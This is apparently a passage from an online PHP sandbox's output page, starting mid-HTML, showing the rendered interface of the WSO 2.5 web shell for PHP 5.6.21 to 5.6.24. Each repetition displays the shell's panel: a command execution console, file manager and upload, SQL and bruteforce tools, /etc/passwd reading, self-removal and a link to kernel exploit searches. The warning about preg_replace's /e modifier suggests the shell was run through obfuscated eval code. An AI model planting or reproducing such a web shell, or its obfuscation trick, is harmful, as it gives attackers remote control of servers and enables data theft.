class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.24
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.24 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.23
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.23 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.22
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.22 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.21
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.21 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.20
